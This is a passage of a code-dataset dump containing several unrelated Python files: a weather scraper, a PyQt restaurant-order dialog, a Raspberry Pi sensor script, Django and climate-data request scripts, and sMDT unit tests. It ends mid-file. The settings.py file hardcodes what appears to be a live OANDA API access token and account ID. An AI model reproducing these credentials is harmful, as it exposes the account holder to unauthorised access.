42","sub_path":"codeXpert/AD대비/C급/자동차경주대회.py","file_name":"자동차경주대회.py","file_ext":"py","file_size_in_byte":686,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"563032521","text":"from selenium import webdriver\n\n#chromdriver path\ndriver = webdriver.Chrome(r'C:\\Users\\HP\\Desktop\\chromedriver.exe')\n\n#placing website url\ndriver.get('https://www.weather-forecast.com/countries/Nepal')\n\n# xpath of place and its temperature\nplaces = driver.find_elements_by_xpath('//span[@class=\"b-list-table_item-name\"]')\ntemp = driver.find_elements_by_xpath('//span[@class=\"temp\"]')\nnumber1 = len(places)\nnumber2 = len(temp)\n\n#opening weather.txt file\nwith open(\"weather.txt\",\"w\") as f:\n for i in range(number1):\n f.write(places[i].text + \"temperature is\" + temp[i].text + \"\\n\")\n\ndriver.close()\n","sub_path":"Weatherdatacrawl.py","file_name":"Weatherdatacrawl.py","file_ext":"py","file_size_in_byte":604,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"401058641","text":"import sys\nimport sqlite3\nfrom PyQt4.QtCore import *\nfrom PyQt4.QtGui import *\nfrom table_display import *\nfrom cascade_style_sheet import *\n\nclass AddItemToOrder(QDialog):\n orderitemAdded = pyqtSignal()\n \"\"\"this class creates a widget to add an item to order\"\"\"\n\n def __init__(self,bookingDetails):\n super().__init__()\n self.setWindowTitle(\"Add Item To Order\")\n self.setMinimumSize(600,600)\n self.bookingDetails = bookingDetails\n self.setStyleSheet(css)\n \n self.main_layout = QVBoxLayout()\n self.add_item_layout = QGridLayout()\n self.add_complete_layout = QHBoxLayout()\n \n self.add_complete = QPushButton(\"Add Item\")\n self.itemID_label = QLabel(\"Item ID : \")\n self.itemQuantity_label = QLabel(\"Item Quantity : \")\n\n #line edit\n regexp = QRegExp(\"^\\\\d\\\\d\\\\d?$\")\n validator = QRegExpValidator(regexp)\n self.input_itemID = QLineEdit()\n self.input_itemID.setValidator(validator)\n self.input_itemID.setMaximumSize(133,30)\n self.input_itemID.setAlignment(Qt.AlignLeft)\n self.input_itemQuantity = QLineEdit()\n self.input_itemQuantity.setValidator(validator)\n 
self.input_itemQuantity.setMaximumSize(133,30)\n\n self.item_table = DisplayTable()\n self.item_table.show_table(\"Items\")\n \n\n self.add_item_layout.addWidget(self.itemID_label,0,0)\n self.add_item_layout.addWidget(self.itemQuantity_label,1,0)\n self.add_item_layout.addWidget(self.input_itemID,0,1)\n self.add_item_layout.addWidget(self.input_itemQuantity,1,1)\n self.add_complete_layout.addWidget(self.add_complete)\n \n self.main_layout.addWidget(self.item_table)\n self.main_layout.addLayout(self.add_item_layout)\n self.main_layout.addLayout(self.add_complete_layout)\n\n self.setLayout(self.main_layout)\n\n self.add_complete.clicked.connect(self.add_item_to_order)\n\n def add_item_to_order(self,bookingDetails):\n bookingID = self.bookingDetails[0]\n self.ItemID = self.input_itemID.text()\n Quantity = self.input_itemQuantity.text()\n MenuItem = (bookingID,self.ItemID,Quantity)\n addedAlready = self.checkExistingItem()\n print(addedAlready)\n\n try:\n\n if addedAlready == True:\n with sqlite3.connect(\"restaurant.db\") as db:\n cursor = db.cursor()\n cursor.execute(\"select Quantity from Booking_Items where ItemID=? and BookingID = ?\",(self.ItemID, bookingID))\n dbquantity = cursor.fetchone()[0]\n \n newQuantity = dbquantity + int(Quantity)\n updateOrder = (newQuantity,self.ItemID)\n with sqlite3.connect(\"restaurant.db\") as db:\n cursor = db.cursor()\n sql = \"update Booking_Items set Quantity=? where ItemID=?\"\n cursor.execute(\"PRAGMA foreign_keys = ON\")\n cursor.execute(sql,updateOrder)\n db.commit()\n \n self.orderitemAdded.emit()\n\n elif addedAlready == False:\n\n with sqlite3.connect(\"restaurant.db\") as db:\n cursor = db.cursor()\n sql = \"insert into Booking_Items(BookingID,ItemID,Quantity) values (?,?,?)\"\n cursor.execute(\"PRAGMA foreign_keys = ON\")\n cursor.execute(sql,MenuItem)\n db.commit()\n\n self.orderitemAdded.emit()\n except sqlite3.IntegrityError:\n QMessageBox.about(self, \"Error\", \"Please make sure the item exists\")\n\n def checkExistingItem(self):\n addedAlready = False\n itemsOrdered = []\n item = \"\"\n \n with sqlite3.connect(\"restaurant.db\") as db:\n cursor = db.cursor()\n cursor.execute(\"\"\"SELECT\n Items.ItemName\n FROM Items\n INNER JOIN Booking_Items\n ON Booking_Items.ItemID = Items.ItemID\n WHERE Booking_Items.BookingID = ? 
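                             -- i.e. the names of every item already ordered on this booking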
\"\"\", (self.bookingDetails[0],))\n items = cursor.fetchall()\n for each in items:\n itemsOrdered.append(each[0])\n\n try:\n with sqlite3.connect(\"restaurant.db\") as db:\n cursor = db.cursor()\n cursor.execute(\"\"\"SELECT\n Items.ItemName\n FROM Items\n INNER JOIN Booking_Items\n ON Booking_Items.ItemID = Items.ItemID\n WHERE Booking_Items.BookingID = ?\n AND Items.ItemID = ?\"\"\", (self.bookingDetails[0], self.ItemID))\n item = cursor.fetchone()[0]\n except TypeError:\n pass\n \n if item in itemsOrdered:\n addedAlready = True\n\n return addedAlready\n\n \n \n\n","sub_path":"Implementation/GUI/add_item_to_order.py","file_name":"add_item_to_order.py","file_ext":"py","file_size_in_byte":5100,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"454536035","text":"import RPi.GPIO as GPIO\nimport datetime\nimport time\nGPIO.setwarnings(False)\nGPIO.setmode(GPIO.BOARD)\nGPIO.setup(13,GPIO.IN)\nGPIO.setup(29,GPIO.IN)\nGPIO.setup(18,GPIO.OUT)\nGPIO.setup(36,GPIO.OUT)\nGPIO.output(36,False)\nGPIO.output(18,False)\n\n#time.sleep(30)\nstartTime= datetime.datetime.now()\n#motion_flag = 0\nmotion_count = 0\n\n\npirA =GPIO.input(13)\npirB =GPIO.input(29)\nif(pirA or pirB) :\n motion_count = motion_count+1\n#motion_flag=motion_flag or pirA or pirB\nendTime= datetime.datetime.now()\ndiff = ((endTime-startTime).total_seconds())/60\nif(diff >=1):\n if(motion_count>=300000):\n # print\"motion\"\n # print motion_count\n# print motion_flag\n GPIO.output(18,True)\n GPIO.output(36,False)\n else:\n # print\"No motion\"\n # print motion_count\n# print motion_flag\n GPIO.output(36,True)\n GPIO.output(18,False)\n motion_count = 0\nendTime2= datetime.datetime.now()\nprint ((endTime2-startTime).total_seconds())\n# motion_flag = 0\n \n \n \n \n \n","sub_path":"otherfiles/sensor.py","file_name":"sensor.py","file_ext":"py","file_size_in_byte":973,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"419954362","text":"from random import *\ndef shuffle(lst):\n lst = lst.split()\n tmp = []\n for i in range(0,len(lst)):\n if len(lst) != 0:\n r = randint(0, len(lst)-1)\n tmp.append(lst[r])\n lst.remove(lst[r])\n for i in tmp:\n print(i, end=\" \")\n print(\"\\n\")\nlst = input(\"Enter the number list: \")\nshuffle(lst)\n","sub_path":"7.py","file_name":"7.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"207398242","text":"from decimal import Decimal\nimport os\n\n\nENVIRONMENTS = { \n \"streaming\": {\n \"real\": \"stream-fxtrade.oanda.com\",\n \"practice\": \"stream-fxpractice.oanda.com\",\n \"sandbox\": \"stream-sandbox.oanda.com\"\n },\n \"api\": {\n \"real\": \"api-fxtrade.oanda.com\",\n \"practice\": \"api-fxpractice.oanda.com\",\n \"sandbox\": \"api-sandbox.oanda.com\"\n }\n}\n\n# The data directory used to store your backtesting CSV files\nCSV_DATA_DIR = \"D:\\\\Backtesting_data\\\\csv\"\n\n# The directory where the backtest.csv and equity.csv files\n# will be stored after a backtest is carried out\nOUTPUT_RESULTS_DIR = \"D:\\\\Backtesting_data\\\\results\"\n\n# Change DOMAIN to \"real\" if you wish to carry out live trading\nDOMAIN = \"practice\"\nSTREAM_DOMAIN = ENVIRONMENTS[\"streaming\"][DOMAIN]\nAPI_DOMAIN = ENVIRONMENTS[\"api\"][DOMAIN]\n\n# Your OANDA API Access Token (found in your Account Details on their website)\nACCESS_TOKEN = \"6c05d53507c7b52c6157538bf3573d14-b405ec354aa02999dabd4b736ed677af\"\n\n# 
Your OANDA Account ID (found in your Account Details on their website)\nACCOUNT_ID = \"2105062\"\n\n# Your base currency (e.g. \"GBP\", \"USD\", \"EUR\" etc.)\nBASE_CURRENCY = \"EUR\"\n\n# Your account equity in the base currency (for backtesting)\nEQUITY = Decimal(\"100000.00\")\n\n\"\"\"\nCSV_DATA_DIR = os.environ.get('QSFOREX_CSV_DATA_DIR', None)\nOUTPUT_RESULTS_DIR = os.environ.get('QSFOREX_OUTPUT_RESULTS_DIR', None)\n\nDOMAIN = \"practice\"\nSTREAM_DOMAIN = ENVIRONMENTS[\"streaming\"][DOMAIN]\nAPI_DOMAIN = ENVIRONMENTS[\"api\"][DOMAIN]\nACCESS_TOKEN = os.environ.get('OANDA_API_ACCESS_TOKEN', None)\nACCOUNT_ID = os.environ.get('OANDA_API_ACCOUNT_ID', None)\n\nBASE_CURRENCY = \"GBP\"\nEQUITY = Decimal(\"100000.00\")\n\"\"\"","sub_path":"settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":1676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"121743899","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('message', '0006_message_wasa2il_usage'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='message',\n name='generate_html_mail',\n field=models.BooleanField(default=False),\n ),\n migrations.AlterField(\n model_name='interactivemessage',\n name='interactive_type',\n field=models.CharField(max_length=60, choices=[(b'registration_received', b'Registration received'), (b'registration_confirmed', b'Registration confirmed'), (b'reject_email_messages', b'Reject mail messages'), (b'email_html_template', b'Email HTML template')]),\n ),\n ]\n","sub_path":"message/migrations/0007_auto_20160802_0034.py","file_name":"0007_auto_20160802_0034.py","file_ext":"py","file_size_in_byte":817,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"16026609","text":"#!/usr/bin/env python\n\"\"\"\nupdate_dreqs_0163.py\n\nThis file creates data requests for additional members of CERFACS'\ncontributions to WP5.\n\"\"\"\nfrom __future__ import (unicode_literals, division, absolute_import,\n print_function)\nimport argparse\nfrom datetime import datetime\nimport logging.config\nimport sys\n\nfrom cf_units import date2num, CALENDAR_GREGORIAN\n\nimport django\ndjango.setup()\n\nfrom pdata_app.models import (DataRequest, VariableRequest, Experiment,\n Institute, ClimateModel, Project, Settings,\n ActivityId)\nfrom pdata_app.utils.dbapi import match_one, get_or_create\n\n\n__version__ = '0.1.0b1'\n\nDEFAULT_LOG_LEVEL = logging.WARNING\nDEFAULT_LOG_FORMAT = '%(levelname)s: %(message)s'\n\nlogger = logging.getLogger(__name__)\n\n\n\ndef parse_args():\n \"\"\"\n Parse command-line arguments\n \"\"\"\n parser = argparse.ArgumentParser(description='Add additional data requests')\n parser.add_argument('-l', '--log-level', help='set logging level to one of '\n 'debug, info, warn (the default), or error')\n parser.add_argument('--version', action='version',\n version='%(prog)s {}'.format(__version__))\n args = parser.parse_args()\n\n return args\n\n\ndef main(args):\n \"\"\"\n Main entry point\n \"\"\"\n activity_id = 'primWP5'\n\n new_dreqs = [\n 'uas_3hr',\n 'vas_3hr',\n 'pr_6hrPlev',\n 'psl_6hrPlev',\n 'tas_6hrPlev',\n 'uas_6hrPlev',\n 'vas_6hrPlev',\n 'zg1000_6hrPlev',\n 'ta_6hrPlevPt',\n 'ua_6hrPlevPt',\n 'va_6hrPlevPt',\n 'zg27_6hrPlevPt',\n 'zg500_AERday',\n 'ptp_AERmon',\n 'rlutaf_AERmon',\n 'rlutcsaf_AERmon',\n 'rsutaf_AERmon',\n 'rsutcsaf_AERmon',\n 
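        # each entry follows the '<cmor_name>_<MIP table>' convention; the pair is
        # split apart on '_' further down when the DataRequest objects are created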
'toz_AERmon',\n 'ztp_AERmon',\n 'clivi_Amon',\n 'clt_Amon',\n 'clwvi_Amon',\n 'evspsbl_Amon',\n 'hfls_Amon',\n 'hfss_Amon',\n 'hur_Amon',\n 'hurs_Amon',\n 'hus_Amon',\n 'huss_Amon',\n 'o3_Amon',\n 'pr_Amon',\n 'prc_Amon',\n 'prsn_Amon',\n 'prw_Amon',\n 'ps_Amon',\n 'psl_Amon',\n 'rlds_Amon',\n 'rldscs_Amon',\n 'rlus_Amon',\n 'rlut_Amon',\n 'rlutcs_Amon',\n 'rsds_Amon',\n 'rsdscs_Amon',\n 'rsdt_Amon',\n 'rsus_Amon',\n 'rsuscs_Amon',\n 'rsut_Amon',\n 'rsutcs_Amon',\n 'sbl_Amon',\n 'sfcWind_Amon',\n 'ta_Amon',\n 'tas_Amon',\n 'tasmax_Amon',\n 'tasmin_Amon',\n 'tauu_Amon',\n 'tauv_Amon',\n 'ts_Amon',\n 'ua_Amon',\n 'uas_Amon',\n 'va_Amon',\n 'vas_Amon',\n 'wap_Amon',\n 'zg_Amon',\n 'ps_CFday',\n 'mlotst_Eday',\n 'rivo_Eday',\n 't20d_Eday',\n 'ta850_Eday',\n 'ts_Eday',\n 'sftgrf_Efx',\n 'cropFracC3_Emon',\n 'cropFracC4_Emon',\n 'evspsblpot_Emon',\n 'grassFracC3_Emon',\n 'grassFracC4_Emon',\n 'intuadse_Emon',\n 'intuaw_Emon',\n 'intvadse_Emon',\n 'intvaw_Emon',\n 'mrtws_Emon',\n 'nwdFracLut_Emon',\n 'orog_Emon',\n 'rls_Emon',\n 'rss_Emon',\n 'sfcWindmax_Emon',\n 't20d_Emon',\n 'thetaot_Emon',\n 'thetaot2000_Emon',\n 'thetaot300_Emon',\n 'thetaot700_Emon',\n 'vegFrac_Emon',\n 'wtd_Emon',\n 'lwsnl_LImon',\n 'sftgif_LImon',\n 'sftgrf_LImon',\n 'snc_LImon',\n 'snd_LImon',\n 'snw_LImon',\n 'baresoilFrac_Lmon',\n 'c3PftFrac_Lmon',\n 'c4PftFrac_Lmon',\n 'cropFrac_Lmon',\n 'gpp_Lmon',\n 'grassFrac_Lmon',\n 'lai_Lmon',\n 'mrfso_Lmon',\n 'mrro_Lmon',\n 'mrros_Lmon',\n 'mrso_Lmon',\n 'mrsos_Lmon',\n 'npp_Lmon',\n 'prveg_Lmon',\n 'ra_Lmon',\n 'rh_Lmon',\n 'treeFrac_Lmon',\n 'tsl_Lmon',\n 'sos_Oday',\n 'tos_Oday',\n 'areacello_Ofx',\n 'basin_Ofx',\n 'deptho_Ofx',\n 'hfgeou_Ofx',\n 'masscello_Ofx',\n 'thkcello_Ofx',\n 'bigthetao_Omon',\n 'bigthetaoga_Omon',\n 'ficeberg_Omon',\n 'friver_Omon',\n 'hfbasin_Omon',\n 'hfcorr_Omon',\n 'hfds_Omon',\n 'hfx_Omon',\n 'hfy_Omon',\n 'htovgyre_Omon',\n 'htovovrt_Omon',\n 'mfo_Omon',\n 'mlotst_Omon',\n 'mlotstmin_Omon',\n 'msftyz_Omon',\n 'rsntds_Omon',\n 'so_Omon',\n 'soga_Omon',\n 'sos_Omon',\n 'sosga_Omon',\n 'tauuo_Omon',\n 'tauvo_Omon',\n 'thetao_Omon',\n 'thkcello_Omon',\n 'tos_Omon',\n 'umo_Omon',\n 'uo_Omon',\n 'vmo_Omon',\n 'vo_Omon',\n 'volo_Omon',\n 'wfo_Omon',\n 'wmo_Omon',\n 'wo_Omon',\n 'zos_Omon',\n 'zossq_Omon',\n 'zostoga_Omon',\n 'rsds_Prim6hr',\n 'rsdsdiff_Prim6hr',\n 'mrso_Primday',\n 'siconc_SIday',\n 'siconca_SIday',\n 'sisnthick_SIday',\n 'sispeed_SIday',\n 'sitemptop_SIday',\n 'sithick_SIday',\n 'sitimefrac_SIday',\n 'siu_SIday',\n 'siv_SIday',\n 'siage_SImon',\n 'siareaacrossline_SImon',\n 'siarean_SImon',\n 'siareas_SImon',\n 'sicompstren_SImon',\n 'siconc_SImon',\n 'siconca_SImon',\n 'sidconcdyn_SImon',\n 'sidconcth_SImon',\n 'sidivvel_SImon',\n 'sidmassdyn_SImon',\n 'sidmassevapsubl_SImon',\n 'sidmassgrowthbot_SImon',\n 'sidmassgrowthwat_SImon',\n 'sidmasslat_SImon',\n 'sidmassmeltbot_SImon',\n 'sidmassmelttop_SImon',\n 'sidmasssi_SImon',\n 'sidmassth_SImon',\n 'sidmasstranx_SImon',\n 'sidmasstrany_SImon',\n 'siextentn_SImon',\n 'siextents_SImon',\n 'sifb_SImon',\n 'siflcondbot_SImon',\n 'siflcondtop_SImon',\n 'siflfwbot_SImon',\n 'siflfwdrain_SImon',\n 'sifllatstop_SImon',\n 'sifllwutop_SImon',\n 'siflsensupbot_SImon',\n 'siflswdbot_SImon',\n 'siflswdtop_SImon',\n 'siflswutop_SImon',\n 'sihc_SImon',\n 'simass_SImon',\n 'simassacrossline_SImon',\n 'sipr_SImon',\n 'sisaltmass_SImon',\n 'sishevel_SImon',\n 'sisnconc_SImon',\n 'sisnhc_SImon',\n 'sisnmass_SImon',\n 'sisnthick_SImon',\n 'sispeed_SImon',\n 'sistrxdtop_SImon',\n 'sistrxubot_SImon',\n 
'sistrydtop_SImon',\n 'sistryubot_SImon',\n 'sitempbot_SImon',\n 'sitempsnic_SImon',\n 'sitemptop_SImon',\n 'sithick_SImon',\n 'sitimefrac_SImon',\n 'siu_SImon',\n 'siv_SImon',\n 'sivol_SImon',\n 'sivoln_SImon',\n 'sivols_SImon',\n 'sndmassdyn_SImon',\n 'sndmassmelt_SImon',\n 'sndmasssi_SImon',\n 'sndmasssnf_SImon',\n 'sndmasssubl_SImon',\n 'snmassacrossline_SImon',\n 'clt_day',\n 'hfls_day',\n 'hfss_day',\n 'huss_day',\n 'pr_day',\n 'psl_day',\n 'rlut_day',\n 'rsds_day',\n 'sfcWindmax_day',\n 'snc_day',\n 'ta_day',\n 'tas_day',\n 'tasmax_day',\n 'tasmin_day',\n 'ua_day',\n 'uas_day',\n 'va_day',\n 'vas_day',\n 'zg_day',\n 'areacella_fx',\n 'areacellr_fx',\n 'mrsofc_fx',\n 'orog_fx',\n 'rootd_fx',\n 'sftgif_fx',\n 'sftlf_fx',\n 'zfull_fx',\n ]\n\n institute_details = {\n 'id': 'CNRM-CERFACS',\n 'model_ids': ['CNRM-CM6-1-HR', 'CNRM-CM6-1'],\n 'calendar': CALENDAR_GREGORIAN\n }\n\n experiments = {\n 'primWP5-amv-neg': {'start_date': datetime(1950, 1, 1),\n 'end_date': datetime(1960, 1, 1)},\n 'primWP5-amv-pos': {'start_date': datetime(1950, 1, 1),\n 'end_date': datetime(1960, 1, 1)}\n }\n\n variant_labels = ['r{}i1p1f2'.format(i) for i in range(11, 26)]\n\n # activity_id\n ActivityId.objects.get_or_create(short_name=activity_id,\n full_name=activity_id)\n\n # Experiment cache\n experiment_objs = []\n for expt in experiments:\n expt_obj = match_one(Experiment, short_name=expt)\n if expt_obj:\n experiment_objs.append(expt_obj)\n else:\n msg = 'experiment {} not found in the database.'.format(expt)\n print(msg)\n raise ValueError(msg)\n\n # Institute\n result = match_one(Institute, short_name=institute_details['id'])\n if result:\n institute = result\n else:\n msg = 'institute_id {} not found in the database.'.format(\n institute_details['id']\n )\n print(msg)\n raise ValueError(msg)\n\n # Look up the ClimateModel object for each institute_id and save the\n # results to a dictionary for quick look up later\n model_objs = []\n for clim_model in institute_details['model_ids']:\n result = match_one(ClimateModel, short_name=clim_model)\n if result:\n model_objs.append(result)\n else:\n msg = ('climate_model {} not found in the database.'.\n format(clim_model))\n print(msg)\n raise ValueError(msg)\n\n # The standard reference time\n std_units = Settings.get_solo().standard_time_units\n\n # create the new data requests\n for new_dreq in new_dreqs:\n cmor_name, table_name = new_dreq.split('_')\n if table_name.startswith('Prim'):\n project = match_one(Project, short_name='PRIMAVERA')\n else:\n project = match_one(Project, short_name='CMIP6')\n\n var_req_obj = match_one(VariableRequest, cmor_name=cmor_name,\n table_name=table_name)\n if var_req_obj:\n for expt in experiment_objs:\n for clim_model in model_objs:\n for var_lab in variant_labels:\n _dr = get_or_create(\n DataRequest,\n project=project,\n institute=institute,\n climate_model=clim_model,\n experiment=expt,\n variable_request=var_req_obj,\n request_start_time=date2num(\n experiments[expt.short_name]['start_date'],\n std_units, institute_details['calendar']\n ),\n request_end_time=date2num(\n experiments[expt.short_name]['end_date'],\n std_units, institute_details['calendar']\n ),\n time_units=std_units,\n calendar=institute_details['calendar'],\n rip_code = var_lab\n )\n else:\n msg = ('Unable to find variable request matching '\n 'cmor_name {} and table_name {} in the '\n 'database.'.format(cmor_name, table_name))\n print(msg)\n raise ValueError(msg)\n\n\nif __name__ == \"__main__\":\n cmd_args = parse_args()\n\n # determine the log level\n 
if cmd_args.log_level:\n try:\n log_level = getattr(logging, cmd_args.log_level.upper())\n except AttributeError:\n logger.setLevel(logging.WARNING)\n logger.error('log-level must be one of: debug, info, warn or error')\n sys.exit(1)\n else:\n log_level = DEFAULT_LOG_LEVEL\n\n # configure the logger\n logging.config.dictConfig({\n 'version': 1,\n 'disable_existing_loggers': False,\n 'formatters': {\n 'standard': {\n 'format': DEFAULT_LOG_FORMAT,\n },\n },\n 'handlers': {\n 'default': {\n 'level': log_level,\n 'class': 'logging.StreamHandler',\n 'formatter': 'standard'\n },\n },\n 'loggers': {\n '': {\n 'handlers': ['default'],\n 'level': log_level,\n 'propagate': True\n }\n }\n })\n\n # run the code\n main(cmd_args)\n","sub_path":"scripts/update_dreqs/update_dreqs_0163.py","file_name":"update_dreqs_0163.py","file_ext":"py","file_size_in_byte":12384,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"84804015","text":"###############################################################################\n# File: test_outer.py\n# Author(s): Paul Johnecheck\n# Date Created: 02 May, 2021\n#\n# Purpose: This file is the home of the test cases \n# that will import the library just like a user/application will.\n#\n# Known Issues:\n#\n# Workarounds:\n#\n###############################################################################\n\ndef test_outer():\n '''\n This test is the simplest use case of the library, and is the example in README.md\n '''\n from sMDT import db,tube\n from sMDT.data import tension\n tubes = db.db()\n tube1 = tube.Tube()\n tube1.tension.add_record(tension.TensionRecord(1.5))\n assert tube1.tension.get_record().tension == 1.5\n\ndef highest(tension_station):\n max_tension = 0\n max_record = None\n for record in tension_station.m_records:\n if record.tension > max_tension:\n max_tension = record.tension\n max_record = record\n return max_record\n\ndef test_user_defined_mode():\n '''\n This test tests the mode system of the station class, and will make a new mode called highest above and test it.\n '''\n from sMDT import tube\n from sMDT.data import station,tension\n tube1 = tube.Tube()\n tube1.tension.add_record(tension.TensionRecord(350))\n tube1.tension.add_record(tension.TensionRecord(370))\n tube1.tension.add_record(tension.TensionRecord(330))\n assert tube1.tension.get_record(highest).tension == 370\n\ndef test_outer_modes():\n '''\n This test tests the mode system of the station class, tests records, built-in modes, and user-defined modes.\n '''\n from sMDT.data import tension,station\n t = tension.Tension()\n t.add_record(tension.TensionRecord(350))\n t.add_record(tension.TensionRecord(330))\n t.add_record(tension.TensionRecord(370))\n t.add_record(tension.TensionRecord(349))\n t.add_record(tension.TensionRecord(351))\n first = t.get_record(mode='first')\n assert first.tension == 350\n assert not first.fail()\n assert not t.fail(mode='first')\n assert t.fail(lambda x: max(x.m_records, key=lambda y: y.tension))\n\ndef test_outer_swage():\n '''\n This test tests the outer library-call use of the swage station.\n '''\n from sMDT.data import swage\n swage_station = swage.Swage() #instantiate swage station object\n swage_station.add_record(swage.SwageRecord(raw_length=3.4, swage_length=3.2))#add 3 SwageRecords to the swage station\n swage_station.add_record(swage.SwageRecord(raw_length=5.2, swage_length=8))\n swage_station.add_record(swage.SwageRecord(raw_length=1.03, swage_length=5))\n assert 
swage_station.get_record(\"first\").raw_length == 3.4 #print the first SwageRecord\n assert not swage_station.fail(\"last\") #print wether the tube fails based on the last record.\n\n\ndef test_outer_tension():\n '''\n This test tests the outer library-call use of the tension station.\n '''\n from sMDT.data import tension\n tension_station = tension.Tension() #instantiate tension station object\n tension_station.add_record(tension.TensionRecord(tension=350, frequency=3.2)) #add 3 TensionRecords to the tension station, nonsense values for frequency\n tension_station.add_record(tension.TensionRecord(tension=345, frequency=8))\n tension_station.add_record(tension.TensionRecord(tension=370, frequency=5))\n assert tension_station.get_record(\"first\").tension == 350 #print the first SwageRecord\n assert tension_station.fail(\"last\") #print the first TensionRecord, and whether the tube fails based on the last record.\n\ndef test_outer_leak():\n '''\n This test tests the outer library-call use of the leak station.\n '''\n from sMDT.data import leak\n leak_station = leak.Leak() #instantiate leak station object\n leak_station.add_record(leak.LeakRecord(leak_rate=0)) #add 3 LeakRecords to the leak station, nonsense values for frequency\n leak_station.add_record(leak.LeakRecord(leak_rate=5))\n leak_station.add_record(leak.LeakRecord(leak_rate=0.00000000001))\n assert leak_station.get_record(\"first\").leak_rate == 0 #print the first SwageRecord\n assert not leak_station.fail(\"last\") #print the first LeakRecord, and whether the tube fails based on the last record.\n\ndef test_outer_darkcurrent():\n '''\n This test tests the outer library-call use of the dark current station.\n '''\n from sMDT.data import dark_current\n darkcurrent_station = dark_current.DarkCurrent() #instantiate darkcurrent station object\n darkcurrent_station.add_record(dark_current.DarkCurrentRecord(3)) #add 3 DarkCurrentRecords to the darkcurrent station, nonsense values for frequency\n darkcurrent_station.add_record(dark_current.DarkCurrentRecord(1e-10))\n darkcurrent_station.add_record(dark_current.DarkCurrentRecord(0))\n assert darkcurrent_station.get_record(\"first\").dark_current == 3 #print the first SwageRecord\n assert not darkcurrent_station.fail(\"last\") #print the first DarkCurrentRecord, and whether the tube fails based on the last record.\n\n\ndef test_comprehensive():\n '''\n This comprehensive tests tests several things also tested by other tests, but this brings it together and does it with many tubes/records\n '''\n\n from sMDT import db,tube\n from sMDT.data import tension\n tubes = db.db()\n dbman = db.db_manager()\n \n id = \"MSU00000\"\n for i in range(50):\n tube1 = tube.Tube()\n for j in range(i+1):\n tube1.tension.add_record(tension.TensionRecord(j))\n tube1.m_tube_id = id + str(i)\n tubes.add_tube(tube1)\n\n dbman.update()\n\n assert tubes.get_tube(id + str(0)).tension.get_record('first').tension == 0\n assert tubes.get_tube(id + str(49)).tension.get_record('last').tension == 49\n\n del tubes\n tubes = db.db()\n assert tubes.get_tube(id + str(0)).tension.get_record('first').tension == 0\n assert tubes.get_tube(id + str(49)).tension.get_record('last').tension == 49\n\ndef test_db_simple():\n from sMDT import db,tube\n from sMDT.data import tension\n tubes = db.db()\n dbman = db.db_manager()\n dbman.wipe('confirm')\n tube1 = tube.Tube()\n id = \"MSU000001\"\n tube1.m_tube_id = id\n tube1.tension.add_record(tension.TensionRecord(1.5))\n\n tubes.add_tube(tube1)\n\n dbman.update()\n\n assert 
tubes.get_tube(id).tension.get_record('first').tension == 1.5\n","sub_path":"test_outer.py","file_name":"test_outer.py","file_ext":"py","file_size_in_byte":6760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"445225636","text":"#!/usr/bin/env python\n\nimport logging\nimport output\nimport configuration\nimport iomap\n\noutputs = {}\noutputs_per_id = {}\n\ndef init():\n logging.debug(\"Outputs init\")\n\n for o in configuration.defined_outputs:\n oobj = output.output(o['name'], o['service'], o['id'])\n outputs_per_id[(o['service'], o['id'])] = oobj\n outputs[o['name']] = oobj\n iomap.Iomap[o['name']] = oobj\n\ndef on_state_change(name, id, state, value):\n #logging.debug(\"Output %s %d state change\", name, id)\n\n if (name, id) not in outputs_per_id:\n #logging.debug(\"Output not known, creating\")\n o = output.output(name + \"_\" + str(id), name, id)\n outputs_per_id[(name, id)] = o\n outputs[o.name] = o\n iomap.Iomap[o.name] = o\n o.on_state_change(state, value)\n else:\n #logging.debug(\"Output known\")\n outputs_per_id[(name, id)].on_state_change(state, value)\n","sub_path":"io-control/outputs.py","file_name":"outputs.py","file_ext":"py","file_size_in_byte":912,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"200309661","text":"import pywt\nimport torch\nimport torch.nn as nn\nimport numpy as np\nimport gc\n\nclass WaveletTransform(nn.Module):\n \"\"\"Some Information about WaveletTransform\"\"\"\n def __init__(self,channel):\n super(WaveletTransform, self).__init__()\n self.level1_conv1x1 = self.conv1x1(channel[0])\n self.level2_conv1x1 = self.conv1x1(channel[1],level=2)\n self.level3_conv1x1 = self.conv1x1(channel[2],level=3)\n self.conv = nn.Conv2d(3,32,kernel_size=3,stride=2,padding=1)\n self.avg_pool = nn.AvgPool2d(kernel_size=2,stride=2)\n self.conv1x = nn.Conv2d(32,64,kernel_size=1)\n self.bn_orig64 = nn.BatchNorm2d(64)\n self.bn_orig32 = nn.BatchNorm2d(32)\n self.relu = nn.ReLU()\n\n def forward(self, x):\n x = x.to(device=\"cpu\")\n orig_input = x\n x_l1=x_l2=x_l3=0\n \n with torch.no_grad():\n # decomposition 1\n coeffs = pywt.dwt2(x,'haar')\n LL, (LH, HL, HH) = coeffs\n LL,LH,HL,HH = torch.tensor(LL),torch.tensor(LH),torch.tensor(HL),torch.tensor(HH)\n x_l1 = torch.cat([LL,LH,HL,HH],1)\n #print(f'Decomposition 1 shape: {x_l1.shape}')\n \n del LL,LH,HL,HH,coeffs\n gc.collect()\n \n # decomposition 2\n coeffs = pywt.dwt2(x_l1,'haar')\n LL1, (LH1, HL1, HH1) = coeffs\n LL1,LH1,HL1,HH1 = torch.tensor(LL1),torch.tensor(LH1),torch.tensor(HL1),torch.tensor(HH1)\n x_l2 = 